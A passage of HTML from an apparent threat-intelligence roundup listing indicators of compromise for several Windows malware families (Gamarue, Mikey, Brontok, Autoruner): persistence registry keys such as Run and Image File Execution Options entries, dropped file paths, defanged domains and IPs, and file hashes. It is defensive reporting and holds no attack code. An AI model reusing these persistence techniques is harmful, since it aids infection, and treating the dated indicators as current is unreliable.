/><ul><li>2f6d9e97206c5bf4937e0d6670d164594415a8941b0ef1b1bb1e4ae0e582e816</li><li>43b28f32e670fce395b4dbbc12998dac81c171f6ff8fb841be4fce90fbe741d9</li><li>57b720358b65e7d57cb0d8abad9b4706271c23a14ae36cbfde7b89d23ecafa23</li><li>5eabc1946ae11fe7e59e9f7ea9160b2ec7060890bb8fabdf732617bd2c2c0d47</li><li>7dde66dbf159d5c9663b2ed51e834b69e47c43191a12702e0e3a5507426ad070</li><li>a77242cb419e6f7fa611d48ffee9e7ea181458c0969d120926610966b11a6335</li><li>ba9a8a1a4e15c6d94763e15a8f51f67b30a6c663ad5c610191d516db518bb139</li><li>e51d13605afc35735e4f46844c93780c9879608050fe909c81951e9ca08a28d3</li><li>e7b86602d4f64895cdacff52c443f64639aeb506b04f695775569c10b1633d3d</li><li>f89c4ecce06bf20400d5110573e84935af0e93149de5a0fde45dc7a9f0b1f9e4</li></ul><br /><h4>Coverage</h4><div 
class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-nzZQDYBvdhA/Wz-6juGUPDI/AAAAAAAAAdA/cwAkTeC2h2IYkonLVV-sY84meqAWKmeUgCLcBGAs/s320/no-web-cws-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://3.bp.blogspot.com/-nzZQDYBvdhA/Wz-6juGUPDI/AAAAAAAAAdA/cwAkTeC2h2IYkonLVV-sY84meqAWKmeUgCLcBGAs/s320/no-web-cws-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-QtVIbsSawks/W-W1eSphgHI/AAAAAAAABH8/beciMF6NXpMqOj8AkW9hmzqqZn1LvzfmwCLcBGAs/s1600/43b28f32e670fce395b4dbbc12998dac81c171f6ff8fb841be4fce90fbe741d9_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://3.bp.blogspot.com/-QtVIbsSawks/W-W1eSphgHI/AAAAAAAABH8/beciMF6NXpMqOj8AkW9hmzqqZn1LvzfmwCLcBGAs/s400/43b28f32e670fce395b4dbbc12998dac81c171f6ff8fb841be4fce90fbe741d9_amp.png" width="400" /></a></div><br /><br /><b>ThreatGrid</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-HRzgSVME6sg/W-W1jD-eD0I/AAAAAAAABIA/ZOShB8wBh4E3V0aOaq6fwvdOPRbzHjjDQCLcBGAs/s1600/ba9a8a1a4e15c6d94763e15a8f51f67b30a6c663ad5c610191d516db518bb139_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://1.bp.blogspot.com/-HRzgSVME6sg/W-W1jD-eD0I/AAAAAAAABIA/ZOShB8wBh4E3V0aOaq6fwvdOPRbzHjjDQCLcBGAs/s640/ba9a8a1a4e15c6d94763e15a8f51f67b30a6c663ad5c610191d516db518bb139_tg.png" width="640" /></a></div><b><br /></b><br /><b>Umbrella</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a 
href="https://2.bp.blogspot.com/--zcLJ-r70wc/W-W1p4W6PWI/AAAAAAAABIE/2FnAUBphsVEgk5qLsd-i-P5TdZXl4w4kwCLcBGAs/s1600/f89c4ecce06bf20400d5110573e84935af0e93149de5a0fde45dc7a9f0b1f9e4_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://2.bp.blogspot.com/--zcLJ-r70wc/W-W1p4W6PWI/AAAAAAAABIE/2FnAUBphsVEgk5qLsd-i-P5TdZXl4w4kwCLcBGAs/s640/f89c4ecce06bf20400d5110573e84935af0e93149de5a0fde45dc7a9f0b1f9e4_umbrella.png" width="640" /></a></div><br /><br /><b>Malware</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9QDNPRi11m4/W-W1wNkzwiI/AAAAAAAABII/NAgoxwc3Sg4DHsuBc_jEYrM3qqYzqvZUACLcBGAs/s1600/5eabc1946ae11fe7e59e9f7ea9160b2ec7060890bb8fabdf732617bd2c2c0d47_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://1.bp.blogspot.com/-9QDNPRi11m4/W-W1wNkzwiI/AAAAAAAABII/NAgoxwc3Sg4DHsuBc_jEYrM3qqYzqvZUACLcBGAs/s640/5eabc1946ae11fe7e59e9f7ea9160b2ec7060890bb8fabdf732617bd2c2c0d47_malware.png" width="640" /></a></div><br /><h3>Win.Trojan.Gamarue-6739927-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>&lt;HKLM&gt;\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run </li><li>&lt;HKLM&gt;\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\ </li><li>&lt;HKLM&gt;\SYSTEM\CONTROLSET001\ENUM\WPDBUSENUMROOT\UMB\2&amp;37C186B&amp;0&amp;STORAGE#VOLUME#_??_USBSTOR#DISK&amp;VEN_GENERIC&amp;PROD_HARDDISK&amp;REV_2.5+#1-0000:00:1D.7-2&amp;0# <ul><li>Value Name: CustomPropertyHwIdKey</li></ul></li><li>&lt;HKLM&gt;\SYSTEM\CONTROLSET001\ENUM\UMB\UMB\1&amp;841921D&amp;0&amp;WPDBUSENUMROOT <ul><li>Value Name: CustomPropertyHwIdKey</li></ul></li><li>&lt;HKLM&gt;\SOFTWARE\MICROSOFT\UPNP DEVICE HOST\HTTP SERVER\VROOTS\/UPNPHOST 
</li><li>&lt;HKLM&gt;\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt </li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Files and or directories created</b><br /><ul><li>\Autorun.inf</li><li>%LocalAppData%\Temp\wmsetup.log</li><li>\??\E:\Autorun.inf</li><li>%LocalAppData%\Temp\NoPorn.exe</li><li>%LocalAppData%\Temp\mplayerc.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\NoPorn.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\mplayerc.exe</li></ul><b>File Hashes</b><br /><ul><li>06c823cc443447348137467a2951dd2d34b4ffdcde178e6d1700394ef5e2793f</li><li>0defd1806fbfbddfd772df482ca562d31e1a01ee9a5d4a5a964d6729bc6051e5</li><li>2da83ddb169023cb60622ef6e297b65dce69151c803fd29d53468b5ec2c6dedf</li><li>2f90ed051dc82a7d8bc389debf88284495f96f56a51e36c1a4a1e41634c28fcc</li><li>3e3decd6f11025d59dbb0c0457b9e5e0353a063d53d5725a3a94836819613a1c</li><li>42fd138ce68919a322202dea37bdafffefca7cf9bb91eb47591c0b6957126478</li><li>44e49ebd375b57146ad486e37db18e7809d01d51c0ed55e8d8afe9c43d3a5485</li><li>478ea2c130bd95ecf1763952f2f644a8b175184284f9713cc35abe0c6f6f848e</li><li>4d60b0ae61b9ef56997be59f7c896f2a60e81e28d267cbcec52a75140e05aa16</li><li>59751557033163959f841a10157e94f1c9fa8e5366a910644f1966a125ad9b35</li><li>5ff49224ceb338b6b35b7303c68ff3df9f87099ffcec50970627a06e938f510a</li><li>6b82c968572a2ab008cb8bca2816d3f7cca491c059aee6b1e7a693b10580e073</li><li>84b9a43ff01d4b6be671749b56dcf724c0c4553153dfa336730f36b42fac6969</li><li>884ae2b467d21f8dbf65bce26b08a6659d75004b22f1af5d7ed8e4198c2688ae</li><li>89653d4159192e8df7843942f543e4a3dbf00e89dc3f957af38778202159ec85</li><li>9b082ca14ca1f7f7244f1a6b93062c01a8c336bf3ef6cab707a2aada4214178b</li><li>bb3f180271e5b2f30e1bdb9e80c75539dc8fb06870cccf571f77cf123297d432</li><li>cd80fcca97cb88cb92da3d5fb396b24e102001d3efc06082e6e3dfded9f8ee0a</li><li>dbcf9f6802b6ab0d218e47c44113e589ecf753dc7701e695bd67e9fe057fbabc</li><li>dfb4bd0bdf964886571dc6dad423d5a6894683b59f6620fa2d426b8a81cad311</li><li>f1ac70e09fc2deabe8184133b0955841be63928bd5f07df647ba89e795701e07</li><li>f4b168493c04afd24a7d93d620122da9483804215f86f68cae2c532a2a5883a9</li><li>fd24deac9cf57d3de7884e3766ad3cc982090fed9068e0b4a02d68cbdb5b9369</li><li>fdd6cf898a92f3343b73400f330ee522ee8d6b947802138c7c17c6c0db82bbe1</li></ul>
<br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-wCXBexgwz28/Wz-6akBh85I/AAAAAAAAAbg/AeWyAjQMrJg7K6XFDEUtI5Ctk0_1u7ezACLcBGAs/s320/amp-email-threatgrid-only.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://4.bp.blogspot.com/-wCXBexgwz28/Wz-6akBh85I/AAAAAAAAAbg/AeWyAjQMrJg7K6XFDEUtI5Ctk0_1u7ezACLcBGAs/s320/amp-email-threatgrid-only.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-vUOn15ABnMw/W-W2AyknlXI/AAAAAAAABIY/miM7cTo4JXECDpeciEYJrwKonnVk79y6ACLcBGAs/s1600/5ff49224ceb338b6b35b7303c68ff3df9f87099ffcec50970627a06e938f510a_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://1.bp.blogspot.com/-vUOn15ABnMw/W-W2AyknlXI/AAAAAAAABIY/miM7cTo4JXECDpeciEYJrwKonnVk79y6ACLcBGAs/s400/5ff49224ceb338b6b35b7303c68ff3df9f87099ffcec50970627a06e938f510a_amp.png" width="400" /></a></div><br /><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-FVBV_haSIAM/W-W2F79BWJI/AAAAAAAABIc/c1IDvOTVTiYRBdoWBOgZEyem5_YIlQvjwCLcBGAs/s1600/5ff49224ceb338b6b35b7303c68ff3df9f87099ffcec50970627a06e938f510a_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 
1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://2.bp.blogspot.com/-FVBV_haSIAM/W-W2F79BWJI/AAAAAAAABIc/c1IDvOTVTiYRBdoWBOgZEyem5_YIlQvjwCLcBGAs/s640/5ff49224ceb338b6b35b7303c68ff3df9f87099ffcec50970627a06e938f510a_tg.png" width="640" /></a></div><br /><br /><h3>Win.Malware.Mikey-6739644-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>&lt;HKCU&gt;\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections </li><li>&lt;HKCU&gt;\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings </li><li>&lt;HKCU&gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\CONTENT <ul><li>Value Name: CachePrefix</li></ul></li><li>&lt;HKCU&gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\COOKIES <ul><li>Value Name: CachePrefix</li></ul></li><li>&lt;HKCU&gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\CACHE\HISTORY <ul><li>Value Name: CachePrefix</li></ul></li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. 
Does not indicate maliciousness<br /><ul><li>statsrichwork[.]com</li></ul><b>Files and or directories created</b><br /><ul><li>files\information.txt</li><li>files\passwords.txt</li><li>US_d19ab989-a35f-4710-83df-7b2db7efe7c51551795182.zip</li></ul><b>File Hashes</b><br /><ul><li>19e073fb9fb7811440e873ae60578b28c06b0aec9e21d730f8205c81b7ababf5</li><li>201872934f7f6674af89597d1a819f79cf843578aa9928191561ebdb637a53cd</li><li>243e098e78e1ff111354e231fac6b01e69f473cb10c27f2485a568316c0395df</li><li>2b52ef895983a4778aaa66dd90cc8bb296ca3b96b891c087c4fcf483d5bf48c6</li><li>3c66d120d27778c2a1110170ad85eed2313fcc5cf55345cdbdc283ada76a86c1</li><li>42228a6bafdf985fc02536b17990299589d967ad44d22dbefdb2dbc44681741b</li><li>48437e0f2c8bc5f0d3f46fec63ce26b3b66dc65610e3c97b4fa8a1b643c8e2f1</li><li>4a2364a4b3e8ad43b505a616486ef537159c8b8df9fe140977c9ab6aa1bad658</li><li>4f80b59c35090b1dbdf94f73770c222352555e7112bec28efb189e3b340b4c2c</li><li>633bcbf980d9299324b3b0baefe80954f06e41a6f71267bfc83c8950a8932696</li><li>6705cf85955113629d95a7206deb524f82ed5a3fe04666d98423b944c3ce2156</li><li>6f74c88c2c04eb117c26d5283d83ac4735928bb50f76b2104be36f8101466aa3</li><li>70a7d3ac821670090237f52308fb6b1ca47e032d3de9267584f59abe247e536a</li><li>711c1db67575b1a795a4aeb439ada79ab8a7cc98f2c68cb0e2beacafa5d044de</li><li>8f815fbcf18c1bc554756233e3fa7d326645a30809042b068ac03daef649c307</li><li>911ce750a17ac1e43d53087630b1e3af416619aff2d086b89b6def0d0bfa927d</li><li>95aa51bc0016bf055d53f1d663b560c97d15d19956787aecf8af7933e6765e5b</li><li>a3347f536bef48b877e49fce133e86b864ef657137ab73db60b62436e2aca7b2</li><li>bb99c43836000b751e3fa1deda851b646f02be036ad9d86a09adb7963bec7b69</li><li>d3edf8ca17f1b41fa96ea9b4377d5778a7965345230425730940444469ce57fb</li><li>da37e831e94b3f7226688cf7f201ef4c032d393ee25bd2437d826a21e08c03b4</li><li>dedb1d0c69521f7c47abc2e6fa925642269fd40a00ea21270b7b950cb101f7be</li><li>f3dd18c0de2af39bfd1dc3498de48e31668f6fdeb89065dcc9e7a81ae6c5046e</li><li>f980768d4d68e75b6d83cff0c80ec153a80bf700f7df3bd53fe9f06bdafda01b</li><li>f99b50470431b2f91b80f3acccbf179441aa24bc702d3f2ba08f4f9f2357d6c8</li></ul>
<br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-nzZQDYBvdhA/Wz-6juGUPDI/AAAAAAAAAdA/cwAkTeC2h2IYkonLVV-sY84meqAWKmeUgCLcBGAs/s320/no-web-cws-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://3.bp.blogspot.com/-nzZQDYBvdhA/Wz-6juGUPDI/AAAAAAAAAdA/cwAkTeC2h2IYkonLVV-sY84meqAWKmeUgCLcBGAs/s320/no-web-cws-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-1UpUKLJub_g/W-W2WjFlsXI/AAAAAAAABIk/R-Cg_xdboMktqus_GDX11FhHIYaqfggUwCLcBGAs/s1600/f99b50470431b2f91b80f3acccbf179441aa24bc702d3f2ba08f4f9f2357d6c8_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://4.bp.blogspot.com/-1UpUKLJub_g/W-W2WjFlsXI/AAAAAAAABIk/R-Cg_xdboMktqus_GDX11FhHIYaqfggUwCLcBGAs/s400/f99b50470431b2f91b80f3acccbf179441aa24bc702d3f2ba08f4f9f2357d6c8_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-1Q7_b4dREMw/W-W2b64K8NI/AAAAAAAABIo/FsemIscFO9056HXvqO3VJEaqFqX4jFGpQCLcBGAs/s1600/4f80b59c35090b1dbdf94f73770c222352555e7112bec28efb189e3b340b4c2c_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://2.bp.blogspot.com/-1Q7_b4dREMw/W-W2b64K8NI/AAAAAAAABIo/FsemIscFO9056HXvqO3VJEaqFqX4jFGpQCLcBGAs/s640/4f80b59c35090b1dbdf94f73770c222352555e7112bec28efb189e3b340b4c2c_tg.png" width="640" /></a></div><br /><br /><b>Umbrella</b><br /><b><br /></b><br /><div class="separator" style="clear: 
both; text-align: center;"><a href="https://2.bp.blogspot.com/-KsGtIMVUmiA/W-W2j3iWFjI/AAAAAAAABIs/aJzEQ9fZKeAO1dAY7BugaCJLG1t2UXyFACLcBGAs/s1600/f3dd18c0de2af39bfd1dc3498de48e31668f6fdeb89065dcc9e7a81ae6c5046e_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://2.bp.blogspot.com/-KsGtIMVUmiA/W-W2j3iWFjI/AAAAAAAABIs/aJzEQ9fZKeAO1dAY7BugaCJLG1t2UXyFACLcBGAs/s640/f3dd18c0de2af39bfd1dc3498de48e31668f6fdeb89065dcc9e7a81ae6c5046e_umbrella.png" width="640" /></a></div><b><br /></b><br /><h3>Win.Worm.Brontok-6739140-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>&lt;HKLM&gt;\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ </li><li>&lt;HKLM&gt;\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\winlogon\ </li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. 
Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Files and or directories created</b><br /><ul><li>%SystemDrive%\autorun.inf</li><li>%SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\WINDOWS\cute.exe</li><li>%SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\WINDOWS\imoet.exe</li><li>%SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\WINDOWS\lsass.exe</li><li>%SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\WINDOWS\smss.exe</li><li>%SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\WINDOWS\winlogon.exe</li><li>%SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\smss.exe</li><li>%SystemDrive%\Data_Rahasia Administrator.exe</li><li>%SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\winlogon.exe</li><li>%SystemDrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\Empty.pif</li><li>%System32%\IExplorer.exe</li><li>%System32%\shell.exe</li><li>%SystemDrive%\Tiwi_Cute.exe</li><li>%System32%\tiwi.scr</li><li>%WinDir%\tiwi.exe</li><li>%SystemDrive%\present.txt</li><li>%SystemDrive%\tiwi.exe</li></ul><b>File Hashes</b><br 
/><ul><li>005aeac3a2685665e22aac6270c7effc4718c92737ace9f6215c1f3e93adf632</li><li>007cfb6540762317643054786cb91843f5f713f879ca20d2abcb63a02ab9c87f</li><li>010b717c887c1f7d8a0f08d73b01f37b6d7a871e2f17ea9dc60a1bcd379b0f8b</li><li>036e59256be20eeed60c1dc49f2182089bd22bbe5aef75bbfe234f9898571d96</li><li>03d0d49484f05ff4461d8bcb40c42c38f72cea2c5b673e93f1329dfecb3824dd</li><li>043f25f1981421906c255dd5379e878ec4c5a359c9492abd3880eaa3176a4578</li><li>052f01970798eb34c728da985358f05ba47134e84c381c96cea52f7274e74d31</li><li>05dbbe0b660825cd4f2453b1afcd483ee3523771bc22a743e913f5e867fa063a</li><li>064e0bbb5470221d65b575e930c7b615af574f4f8395d573afbaa034ae4ffc6b</li><li>06569b13aa7a18eea8a863c768fe47468e505a898a9b689c376ab3cb3f957b80</li><li>0676fd79294f4ca277380e44085176012b97e5e07ab652009ce85791294a6f95</li><li>068f0a2d6b99b2701ae41325851a6fa258059c535765c2eb9ba30fd94118b995</li><li>0721857c17edb718c984d002fd24e754672e3d2eccaef2dcbc78f7ce0a902eac</li><li>0830ddb3dd73dbdbe524db466a035a85ba2e1eff6de24738d7ab42acd4ce4da1</li><li>08fabe5f7aabaa4e2f8a432f9e8287c7c80073dc05dc4fc9e8590f1bf15c25c4</li><li>09600f1b158f792909a105e155bde59e24f6e46322a13b7109649d15c97689da</li><li>0b70dbba443121a8aed5e4adb630737a773622ef16415034f5e1ef7af9a18d28</li><li>0b7a26dd115453a5530b387338b18d05d826e5ac3174399567f03376e2e67335</li><li>0c902a3a4a2a36d64351861dc4d8c2ad74a1415aff9b5f71ffc3e740a691483f</li><li>0cb7d5f688faf979b0d53200b507c0ab49446e2fc798635dca699ca6bfc2cf53</li><li>0dc9618e5edc34a8ada892b5c5a403eb9e64eb8e51772d35f4ee79959bccb686</li><li>0e8a750df320de2ee02b70b9c27b77d835ffe4c0c57b0ec6aca73e2df78f39e3</li><li>0ed1e47a487b750d9fa86743fe7d8a285292bf68169d61a0097570dffae443a9</li><li>0ee895125c27f3def3a2a60a2c16b9a66e0c2752337e621ce3cf0a2d70372aeb</li><li>0ff2198fa27c38bfbbaeb1e56f28696ceed254b749ee3b44d1163d41ebac534b</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a 
href="https://4.bp.blogspot.com/-wCXBexgwz28/Wz-6akBh85I/AAAAAAAAAbg/AeWyAjQMrJg7K6XFDEUtI5Ctk0_1u7ezACLcBGAs/s320/amp-email-threatgrid-only.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://4.bp.blogspot.com/-wCXBexgwz28/Wz-6akBh85I/AAAAAAAAAbg/AeWyAjQMrJg7K6XFDEUtI5Ctk0_1u7ezACLcBGAs/s320/amp-email-threatgrid-only.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-yTyDpd5M22k/W-W2v-LH2AI/AAAAAAAABI4/nE-sxFinzlIe_6P6QgGYuDfQjpReWI12ACLcBGAs/s1600/09600f1b158f792909a105e155bde59e24f6e46322a13b7109649d15c97689da_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://2.bp.blogspot.com/-yTyDpd5M22k/W-W2v-LH2AI/AAAAAAAABI4/nE-sxFinzlIe_6P6QgGYuDfQjpReWI12ACLcBGAs/s400/09600f1b158f792909a105e155bde59e24f6e46322a13b7109649d15c97689da_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/--b9lGzJ5wA0/W-W21yEFA4I/AAAAAAAABJA/9yKN9HDbrwo-bds4VqNKSN4vSZlwT8EvwCLcBGAs/s1600/0830ddb3dd73dbdbe524db466a035a85ba2e1eff6de24738d7ab42acd4ce4da1_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://2.bp.blogspot.com/--b9lGzJ5wA0/W-W21yEFA4I/AAAAAAAABJA/9yKN9HDbrwo-bds4VqNKSN4vSZlwT8EvwCLcBGAs/s640/0830ddb3dd73dbdbe524db466a035a85ba2e1eff6de24738d7ab42acd4ce4da1_tg.png" width="640" /></a></div><b><br /></b><br /><h3>Win.Trojan.Autoruner-6733593-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>&lt;HKLM&gt;\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\WINSERVICES.EXE <ul><li>Value Name: 
Debugger</li></ul></li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>204[.]79[.]197[.]200</li><li>91[.]195[.]240[.]94</li><li>72[.]21[.]81[.]200</li><li>23[.]79[.]219[.]185</li><li>67[.]202[.]94[.]93</li><li>50[.]23[.]131[.]235</li><li>23[.]3[.]96[.]25</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>kz0t0g6xn457m449312vx962m32v69[.]ipcheker[.]com</li><li>17d98a5d[.]akstat[.]io</li><li>r0u603u61y8999y[.]directorio-w[.]com</li><li>4o91sy32347o7x636pk2084dk0p66z[.]ipgreat[.]com</li><li>8s8908905t67uc0a75zm35c78xq0ex[.]ipcheker[.]com</li><li>7r3u5sm670kplbt6w1036p7ployl36[.]ipcheker[.]com</li></ul><b>Files and or directories created</b><br /><ul><li>\??\E:\autorun.inf</li><li>%UserProfile%\27F6471627473796E696D64614\winlogon.exe</li><li>\$RECYCLE.BIN.LNk</li></ul><b>File Hashes</b><br /><ul><li>00de9aefee7e84028781e5d88e23c7ac53d8a10aa97116411d43b6532112fa16</li><li>01474c0dacb671b37172b985d8e96bb688f2e4f6f8975a6bdab76c3ebb6ca29a</li><li>0206ba28fd335c6470736f976885f5916375e114ce442208f30aaca55525d41c</li><li>027b08647ec8a4976897114dcac6810acb215dc13805edd0986d4bce04528f59</li><li>02e94f61d5c4da2b4a3b8991278a77e937da0de55b2f5373f804344cae73dad8</li><li>033c6325a22ddee4d621558106fd297407f31e0713c7c2314024e8cbcdc0a5b3</li><li>05d0ef6586355e9255a5723ae5909602de6def71e64f3e1838211bb0d3c9de81</li><li>06bdc32de83eec39c9153b7944b8abc0137e3b69c80ac02e74d6903c656915e7</li><li>06e53af6c4bde93f7a9da0b90408e59b701d1ced02c5fb14fba45c7272452367</li><li>082831142fe7826130b5d5ac7673d9ae8f7f56e126348283e77fc3c88f4d5b0b</li><li>08617dcb9523e28efed1e47917b6f9dc6dfb534c6d0d7df0888e977099f4db71</li><li>09a8a4d6b7e8d68dcbf7279923f5d8322e4d46dea86ca1da0f553bdb1f5fc222</li><li>09c40f54a73303ddf1d6170f3cd06778583260e82b7dfe155a2f804346aadfc9</li><li>0b032c40e0877bd1c4aeca8bf56b87d0daacc781ad2cb025cdc7c3944074e816</li><li>0b979d82d329160c7f95cb8abc9ccc8e0ebb4f981
ee321342e84a29ff33687f9</li><li>0be8709e38625829811638c2460a8eaa993569df882f4a7263747f91bd08970a</li><li>0e47b656aa6dfdc797ff650a7d1800639f7347d2af4fd0ae6520e02ff0cec9a0</li><li>0eeb8d4cb796e8460ea5c283deed8788356822e6a7916c9cec496dc7cf4f3ab2</li><li>101217714340fcd5d1194ac746d2b4c9d42f739f12b983ce33801d2baebb71ab</li><li>11e0b16cfcd0e45c21a1fbe9b7b14bf019f3e2ceb7894eee8e458eb6a7571c34</li><li>12e12efef70cc7824ea45771c844393d1e1b878a86def41acc01093249bc7e19</li><li>1374cf423bc66983991c7fd3e3767aedf67094cf5a3eff6eb695112b51dc5e6a</li><li>13910ca1a7fbadf757c082dde5d1724b6b46d36b9eae47d1bd968c66a67be3ba</li><li>17ea3123406cb0ef21c174f4f27a89d4cbd5b61ff1359ec9b8c756b311ee0f4d</li><li>183b07b0a5e93388d391deeac811b405d0cf46c66f3817efe535780a6d06c10a</li></ul><br /><h4>Coverage</h4><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-rz8tNLHbJPQ/W-W3C8ylfuI/AAAAAAAABJI/cU97rpKwHyUyZzPIB_2lRBRqv3D6w_6oACLcBGAs/s1600/4cc53c51bed05eb3fc362b8a8436d5ba43b8c31ed6ceac9d3fd0d2fb521a9049_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://1.bp.blogspot.com/-rz8tNLHbJPQ/W-W3C8ylfuI/AAAAAAAABJI/cU97rpKwHyUyZzPIB_2lRBRqv3D6w_6oACLcBGAs/s400/4cc53c51bed05eb3fc362b8a8436d5ba43b8c31ed6ceac9d3fd0d2fb521a9049_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a 
